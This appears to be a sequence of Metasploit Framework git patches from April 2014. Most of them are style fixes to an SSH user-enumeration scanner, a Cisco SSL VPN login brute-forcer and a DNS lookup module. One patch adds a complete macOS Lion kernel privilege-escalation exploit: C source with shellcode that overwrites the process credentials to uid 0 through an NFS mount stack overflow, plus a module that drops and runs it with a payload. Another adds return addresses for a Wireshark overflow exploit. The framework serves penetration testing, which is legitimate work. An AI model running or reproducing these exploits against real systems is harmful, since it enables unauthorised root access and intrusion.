c9d8da991aa4f0aaa3dee264b344961bf8a46c81 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:16:16 +0200 Subject: [PATCH 142/853] Use Rex.sleep instead of select --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 09e625e9f6..25c3ce0dca 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) if attempt_num > 0 - select(nil, nil, nil, 2**attempt_num) + Rex.sleep(2 ** attempt_num) print_debug "Retrying '#{user}' on '#{ip}' due to connection error" end From 96f042110f15941ccace98e1b22569e1ae81c59f Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:18:50 +0200 Subject: [PATCH 143/853] return is not needed when it's the last lifunction line --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 25c3ce0dca..e5ff043108 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -106,9 +106,9 @@ class Metasploit3 < Msf::Auxiliary finish_time = Time.new if finish_time - start_time > threshold - return :success + :success else - return :fail + :fail end end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary def user_list - return File.new(datastore['USER_FILE']).read.split + File.new(datastore['USER_FILE']).read.split end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary ret = check_user(ip, user, rport) attempt_num += 1 end - return ret + ret end From 4d9ece2f9a800227661d0ce3a962be254dbfb294 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:34:08 -0400 Subject: [PATCH 144/853] Add hyphens and digits to group regex --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 9a0507fc91..a04dac6047 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary match = res.body.match(group_name_regex) group_string = match[1] - groups = group_string.scan(/'(\w+)'/).flatten.to_set + groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set end return groups From 3d793fc6f1f57824b9b3fb62c55b45e3a53fe409 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:45:04 -0400 Subject: [PATCH 145/853] Add default VPN group fall back --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index a04dac6047..3d13dba438 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -54,7 +54,15 @@ class Metasploit3 < Msf::Auxiliary if datastore['GROUP'].empty? print_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups - print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") unless groups.empty? + + if groups.empty? + print_good("#{peer} - Unable to enumerate groups") + print_good("#{peer} - Using the default group: DefaultWEBVPNGroup") + groups << "DefaultWEBVPNGroup" + else + print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + end + else groups << datastore['GROUP'] end From f71ad111dabcf347e5ce770b72c617233b0f44cb Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:48:16 -0400 Subject: [PATCH 146/853] Change return values from nil to false --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 3d13dba438..95d59cca40 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -40,12 +40,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? print_error("#{peer} - Connection failed, Aborting...") - return + return false end unless is_app_ssl_vpn? print_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") - return + return false end print_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") From b3cabaaa28f3f12316a08d9a5a75e473f61708f0 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:58:14 -0400 Subject: [PATCH 147/853] Clean up some formatting concerns --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 74 ++++++++++--------- 1 file changed, 39 insertions(+), 35 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 95d59cca40..87cd705d49 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -79,30 +79,30 @@ class Metasploit3 < Msf::Auxiliary # Verify whether the connection is working or not def check_conn? begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) + res = send_request_cgi('uri' => '/', 'method' => 'GET') print_good("#{peer} - Server is responsive...") - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, + ::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionError, + ::Errno::EPIPE return end end def enumerate_vpn_groups - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + ) if res && res.code == 302 - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'method' => 'GET', + ) end groups = Set.new @@ -120,18 +120,18 @@ class Metasploit3 < Msf::Auxiliary # Verify whether we're working with SSL VPN or not def is_app_ssl_vpn? - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + ) if res && res.code == 302 - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'method' => 'GET', + ) end if res && @@ -145,11 +145,11 @@ class Metasploit3 < Msf::Auxiliary end def do_logout(cookie) - res = send_request_cgi({ - 'uri' => '/+webvpn+/webvpn_logout.html', - 'method' => 'GET', - 'cookie' => cookie - }) + res = send_request_cgi( + 'uri' => '/+webvpn+/webvpn_logout.html', + 'method' => 'GET', + 'cookie' => cookie + ) end # Brute-force the login page @@ -175,13 +175,13 @@ class Metasploit3 < Msf::Auxiliary post_params['group_list'] = group unless group.empty? - resp = send_request_cgi({ - 'uri' => '/+webvpn+/index.html', - 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => cookie, - 'vars_post' => post_params - }) + resp = send_request_cgi( + 'uri' => '/+webvpn+/index.html', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => cookie, + 'vars_post' => post_params + ) if resp && resp.code == 200 && @@ -210,7 +210,11 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, + ::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionError, + ::Errno::EPIPE print_error("#{peer} - HTTP Connection Failed, Aborting") return :abort end From d70aa4cdbbda9faab4c178e9aa55d8f6f95f23ae Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 22:07:25 -0400 Subject: [PATCH 148/853] Fix MSFTidy complaints --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 87cd705d49..9dec6c83a1 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if datastore['GROUP'].empty? print_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups - + if groups.empty? print_good("#{peer} - Unable to enumerate groups") print_good("#{peer} - Using the default group: DefaultWEBVPNGroup") @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary groups << datastore['GROUP'] end groups << "" - + print_status("#{peer} - Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| @@ -100,8 +100,9 @@ class Metasploit3 < Msf::Auxiliary res.code == 302 res = send_request_cgi( - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', + 'vars_get' => { 'fcadbadd' => "1" } ) end @@ -119,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary end # Verify whether we're working with SSL VPN or not - def is_app_ssl_vpn? + def is_app_ssl_vpn? res = send_request_cgi( 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', @@ -129,8 +130,9 @@ class Metasploit3 < Msf::Auxiliary res.code == 302 res = send_request_cgi( - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', + 'vars_get' => { 'fcadbadd' => "1" } ) end @@ -157,10 +159,10 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin - cookie = "webvpn=; " + - "webvpnc=; " + - "webvpn_portal=; " + - "webvpnSharePoint=; " + + cookie = "webvpn=; " + + "webvpnc=; " + + "webvpn_portal=; " + + "webvpnSharePoint=; " + "webvpnlogin=1; " + "webvpnLang=en;" From 143aede19cc1f4a69c092651d5966005442d9270 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 23 Apr 2014 02:32:42 -0500 Subject: [PATCH 149/853] Add osx nfs_mount module. --- .../osx/nfs_mount_priv_escalation.bin | Bin 0 -> 9356 bytes .../source/osx/nfs_mount_priv_escalation.c | 165 ++++++++++++++++++ modules/exploits/osx/local/nfs_mount_root.rb | 93 ++++++++++ 3 files changed, 258 insertions(+) create mode 100644 data/exploits/osx/nfs_mount_priv_escalation.bin create mode 100644 external/source/osx/nfs_mount_priv_escalation.c create mode 100644 modules/exploits/osx/local/nfs_mount_root.rb diff --git a/data/exploits/osx/nfs_mount_priv_escalation.bin b/data/exploits/osx/nfs_mount_priv_escalation.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe182e56932f6ee4f332167d235bf392aef3bf2f GIT binary patch literal 9356 zcmeHNeQX>@6`yn5&55e*Nd$!U0+$0E3RPhEHY7^r(+3mjew9cMWHes5 z9-nXY?R6P@#MdiI*>N@C#8S4eRqfw|u{UCj5LfzFZJYb#90IP?md-t$6}{LGT!&y^ zR8#H~+T~thQ7Y?X2H}?)jyYJ~kFwX|t82Rp_DLW&RH<}Q9wlpn}3h&*tTnXbj!9NpTiRodEs_f$I- zEFl=1FlYy8P$HHPX8@Yk3&B0d{l6A<5|}<5`LqxhK|hAtg~~!5Rz3@_i@B`@c2Th~ ze%&IezqS_SD^T0=Ij1d|=xysil;0{WOQM%bLVO05 z^Pj-_1bdzGTB$|g|1knz6w-T7j-9_K3x~t9m~Zl~jGYKg|7nQ~U6S6}_v_`@bXbnv zC-NVVD?NrFcr&FR;oW+95@j!jliIRS-^_%Og;9x4kaNg8kTVc&DtjZhdn1;dInEC{ z`NYq|(CO}cth1+cf2Zm>*>kdS-6(nl?a3$p%6GRnD+>)9@rOzlZj|26Suc87dijzp zj_)g%%W@`?K(*C9_-gA>S^AG9$dg4q;@_9$Ki`vT>U*e5-=}|rz zn-%%nWbuZ-Yp-WY4WLIu(8r4Y8B`Xu-oUF^Fe85h zX)yBT`H}6f%i=9BX`Q#FcWUBvX==Vx7K?h}iuXJRji1q1@7P8iGfd)CVVt~oqV%P? zC*E250{DU$n{CLi!qZdc=`l#(Z-n5G5p1b=3g)tP&H|P88>MxSmcl`o%jxVgT}_Y% z)A=3zD*chpO*71!cSA>q_&vxlX2^_rhk8HIdWcTGOBSLfS%`!;y{=d1QK}U;cWdoq zYyD~ND2$VvczO-m9o`A7YFPJ7qler##@SQi&Yg+Ai&hk(?|RYmh3I)C!y2wQlA*A7 zR^E5k8?T3MzOkSwa*9dQbF#z?n=Ch9!jsF*mv#GrZfA9SMYkX7_Ns0to9<1HEEnB(^;m8yn~tS4n;Pm*I9j>Sv16{?Z{@PdOv1IYF*n|v zTQ1TAInn*O9?QAIbHajI>rf`|SO@JSzIW~Qa2qacaWdH~9f(;u{E|zy ziniWFx-AzMclGJ7(c2LQmP(2h(!VzE24&?hMHcc{One#EiJQ&0Q3MzTSrC+)4HJ5N zw+M|ig_>3@3s0i|PRRL`@D&6dWm_Vn<0<{R#B2bG!EdsR&)FM!eKrI5-kHD%8V($a{arYNd zyb6!?4XM8PkQ&U#oPP0;(=i$0C6>M@yy;owqqP}HU3dIEXZ#$|tuaoMV`oN?Y|izE+&mWYe1(Tw6~r>;-*42#|+ zVro4kN7)=_b9#NSIu}<*y2x|jN*s_(;UbdfB)q3w$%{#I4zn6;BZR?u&8-Fp=QbM* z4$f^_ftQ3Z7=`xkN9Fk7d}li`J8=C-@{qy7z276ikh4pd186HT4-+f#m#gqoRru*D z{7e;ot_r_gg{P|UD^-}s+?D?D7NHXVstUhVg?Y+csgGq~X!JVZs7l}A^YE1s<$XEV z<0e#|-`#@xanv=a`c6ZL2=7JzTN{>8PJ6qnu%T2|{~LqS`>;>=bQrhv^LtLI#amJZ z8&>IU?C)y~^3xTJpECZ}HPLr1=A%jeWYdQs0mbqt=F37e; IZxzJp-zo3FDgXcg literal 0 HcmV?d00001 diff --git a/external/source/osx/nfs_mount_priv_escalation.c b/external/source/osx/nfs_mount_priv_escalation.c new file mode 100644 index 0000000000..86098b5a44 --- /dev/null +++ b/external/source/osx/nfs_mount_priv_escalation.c @@ -0,0 +1,165 @@ +/* + * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit + * CVE None + * by Kenzley Alphonse + * + * + * Notes: + * This exploit leverage a stack overflow vulnerability to escalate privileges. + * The vulnerable function nfs_convert_old_nfs_args does not verify the size + * of a user-provided argument before copying it to the stack. As a result by + * passing a large size, a local user can overwrite the stack with arbitrary + * content. + * + * Tested on Max OS X Lion xnu-1699.22.73 (x86_64) + * Tested on Max OS X Lion xnu-1699.32.7 (x86_64) + * + * Greets to taviso, spender, joberheide + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/** change these to fit your environment if needed **/ +#define SSIZE (536) + +/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/ +struct user_nfs_args { + int version; /* args structure version number */ + char* addr __attribute__((aligned(8))); /* file server address */ + int addrlen; /* length of address */ + int sotype; /* Socket type */ + int proto; /* and Protocol */ + char * fh __attribute__((aligned(8))); /* File handle to be mounted */ + int fhsize; /* Size, in bytes, of fh */ + int flags; /* flags */ + int wsize; /* write size in bytes */ + int rsize; /* read size in bytes */ + int readdirsize; /* readdir size in bytes */ + int timeo; /* initial timeout in .1 secs */ + int retrans; /* times to retry send */ + int maxgrouplist; /* Max. size of group list */ + int readahead; /* # of blocks to readahead */ + int leaseterm; /* obsolete: Term (sec) of lease */ + int deadthresh; /* obsolete: Retrans threshold */ + char* hostname __attribute__((aligned(8))); /* server's name */ + /* NFS_ARGSVERSION 3 ends here */ + int acregmin; /* reg file min attr cache timeout */ + int acregmax; /* reg file max attr cache timeout */ + int acdirmin; /* dir min attr cache timeout */ + int acdirmax; /* dir max attr cache timeout */ + /* NFS_ARGSVERSION 4 ends here */ + uint auth; /* security mechanism flavor */ + /* NFS_ARGSVERSION 5 ends here */ + uint deadtimeout; /* secs until unresponsive mount considered dead */ +}; + +/** sets the uid for the current process and safely exits from the kernel**/ +static void r00t_me() { + asm( + // padding + "nop; nop; nop; nop;" + + // task_t %rax = current_task() + "movq %%gs:0x00000008, %%rax;" + "movq 0x00000348(%%rax), %%rax;" + + // proc %rax = get_bsdtask_info() + "movq 0x000002d8(%%rax),%%rax;" + + // ucred location at proc + "movq 0x000000d0(%%rax),%%rax;" + + // uid = 0 + "xorl %%edi, %%edi;" + "movl %%edi, 0x0000001c(%%rax);" + "movl %%edi, 0x00000020(%%rax);" + + // fix the stack pointer and return (EACCES) + "movq $13, %%rax;" + "addq $0x00000308,%%rsp;" + "popq %%rbx;" + "popq %%r12;" + "popq %%r13;" + "popq %%r14;" + "popq %%r15;" + "popq %%rbp;" + "ret;" + :::"%rax" + ); +} + +int main(int argc, char ** argv) { + struct user_nfs_args xdrbuf; + char * path; + char obuf[SSIZE]; + + + /** clear the arguments **/ + memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args)); + memset(obuf, 0x00, SSIZE); + + /** set up variable to get path to vulnerable code **/ + xdrbuf.version = 3; + xdrbuf.hostname = "localhost"; + xdrbuf.addrlen = SSIZE; + xdrbuf.addr = obuf; + + /** set ret address **/ + *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5); + printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]); + + /** create a unique tmp name **/ + if ((path = tmpnam(NULL)) == NULL) { + // path can be any directory which we have read/write/exec access + // but I'd much rather create one instead of searching for one + perror("[-] tmpnam"); + exit(EXIT_FAILURE); + } + + /** make the path in tmp so that we can use it **/ + if (mkdir(path, 0660) < 0) { + perror("[-] mkdir"); + exit(EXIT_FAILURE); + } + + /** inform the user that the path was created **/ + printf("[*] created sploit path%s\n", path); + + /** call the vulnerable function **/ + if (mount("nfs", path, 0, &xdrbuf) < 0) { + if (errno == EACCES) { + puts("[+] escalating privileges..."); + } else { + perror("[-] mount"); + } + + } + + /** clean up tmp dir **/ + if (rmdir(path) < 0) { + perror("[-] rmdir"); + } + + /** check if privs are equal to root **/ + if (getuid() != 0) { + puts("[-] priviledge escalation failed"); + exit(EXIT_FAILURE); + } + + /** get root shell **/ + printf("[+] We are now uid=%i ... your welcome!\n", getuid()); + printf("[+] Dropping a shell.\n"); + + /** execute **/ + execl("/bin/sh", "/bin/sh", "-c", argv[1], NULL); + return 0; +} diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb new file mode 100644 index 0000000000..7ab4242f50 --- /dev/null +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit', + 'Description' => %q{ + This exploit leverage a stack overflow vulnerability to escalate privileges. + The vulnerable function nfs_convert_old_nfs_args does not verify the size + of a user-provided argument before copying it to the stack. As a result by + passing a large size, a local user can overwrite the stack with arbitrary + content. + + Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kenzley Alphonse', # discovery and a very well-written exploit + 'joev' # msf module + ], + 'References' => + [ + [ 'EDB', '32813' ] + ], + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86_64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.7 Lion x64 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64 + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 11 2014' + )) + end + + def check + if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8" + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx') + file = File.join(osx_path, 'nfs_mount_priv_escalation.bin') + exploit = File.read(file) + pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) + tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + + print_status "Writing temp file... #{tmpfile}" + write_file(tmpfile, exploit) + register_file_for_cleanup(tmpfile) + + print_status "Writing payload file... #{payloadfile}" + write_file(payloadfile, pload) + register_file_for_cleanup(payloadfile) + + print_status "Executing payload..." + cmd_exec("chmod +x #{tmpfile}") + cmd_exec("chmod +x #{payloadfile}") + cmd_exec("#{tmpfile} #{payloadfile}") + end + + def xnu_ver + m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/) + m && m[1] + end + + def ver_lt(a, b) + Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,'')) + end + +end From 457c48b89b9c2c9deffb18db632703a2764a01ef Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Wed, 23 Apr 2014 11:38:23 +0200 Subject: [PATCH 150/853] Error on sleep --- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 129da312d8..2764c0b336 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary # Basic Throttling sleep_time = 0.0 if (datastore['THROTTLE'] != 0) - sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] + sleep_time = (1.0/datastore['THROTTLE'])*datastore['THREADS'] print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") end # Output.. From 1a2899d57b8d0017dcc81124b09531b5891756ba Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 23 Apr 2014 10:00:34 -0500 Subject: [PATCH 151/853] Fix up whitespace 'n' stuff --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 62 +++++++------------ 1 file changed, 24 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index e5ff043108..5a08c128e2 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,50 +12,47 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - def initialize - super( + def initialize(info = {}) + super(update_info(info 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. }, 'Author' => ['kenkeiras'], 'References' => - [ - ['CVE', '2006-5229'] - ], + [ + ['CVE', '2006-5229'] + ], 'License' => MSF_LICENSE - ) + )) register_options( [ + Opt::RPORT(22), OptPath.new('USER_FILE', - [true, 'File containing usernames, one per line', nil]), + [true, 'File containing usernames, one per line', nil]), OptInt.new('THRESHOLD', - [true, - 'Amount of seconds needed before a user is considered ' \ - 'found', 10]), - Opt::RPORT(22) + [true, + 'Amount of seconds needed before a user is considered ' \ + 'found', 10]) ], self.class ) register_advanced_options( [ - OptBool.new('SSH_DEBUG', - [false, 'Enable SSH debugging output (Extreme verbosity!)', - false]), - - OptInt.new('SSH_TIMEOUT', - [false, 'Specify the maximum time to negotiate a SSH session', - 10]), - OptInt.new('RETRY_NUM', [true , 'The number of attempts to connect to a SSH server' \ - ' for each user', 3]) + ' for each user', 3]), + OptInt.new('SSH_TIMEOUT', + [false, 'Specify the maximum time to negotiate a SSH session', + 10]), + OptBool.new('SSH_DEBUG', + [false, 'Enable SSH debugging output (Extreme verbosity!)', + false]) ] ) end - def rport datastore['RPORT'] end @@ -90,16 +87,12 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse return :connection_error - rescue Net::SSH::Disconnect, ::EOFError return :success - rescue ::Timeout::Error return :success - rescue Net::SSH::Exception end @@ -112,29 +105,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_report(ip, user, port) report_auth_info( - :host => ip, - :port => rport, - :sname => 'ssh', - :user => user, + :host => ip, + :port => rport, + :sname => 'ssh', + :user => user, :active => true ) end - def user_list File.new(datastore['USER_FILE']).read.split end - def attempt_user(user, ip) attempt_num = 0 ret = nil while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) - if attempt_num > 0 Rex.sleep(2 ** attempt_num) print_debug "Retrying '#{user}' on '#{ip}' due to connection error" @@ -143,28 +132,25 @@ class Metasploit3 < Msf::Auxiliary ret = check_user(ip, user, rport) attempt_num += 1 end + ret end - def show_result(attempt_result, user, ip) case attempt_result when :success print_good "User '#{user}' found on #{ip}" do_report(ip, user, rport) - when :connection_error print_error "User '#{user}' on #{ip} could not connect" - when :fail print_debug "User '#{user}' not found on #{ip}" - end end - def run_host(ip) print_status "Starting scan on #{ip}" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end + end From 0a108acea3fdfcb473bafc639282275b5050b8f9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 23 Apr 2014 10:08:37 -0500 Subject: [PATCH 152/853] Fix missing comma Commas will be the death of me. --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 5a08c128e2..834494d700 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::CommandShell def initialize(info = {}) - super(update_info(info + super(update_info(info, 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. From fd95d9ef382cdd53940ab7696047881f53b9ac70 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Wed, 23 Apr 2014 17:32:56 +0100 Subject: [PATCH 153/853] Added english windows xp sp2 target --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 934449dbb8..16f1f81771 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,10 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], + [ 'WinXP SP2 English (bypass DEP)', + { + 'OffSet2' => 70692, + 'OffSet' => 70476, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 1)) register_options( [ From e2b92a824f531503b9e52f7a5368e949ffccead8 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 23 Apr 2014 18:56:27 -0400 Subject: [PATCH 154/853] Change white space for authors in dns_reverse_lookup --- modules/auxiliary/gather/dns_reverse_lookup.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 2764c0b336..b472ae5b10 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -17,8 +17,11 @@ class Metasploit3 < Msf::Auxiliary This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ', # Base code - 'Thanat0s '], # Output, Throttling & Db notes add + 'Author' => + [ + 'Carlos Perez ', # Base code + 'Thanat0s ' # Output, Throttling & Db notes add + ], 'License' => BSD_LICENSE )) From 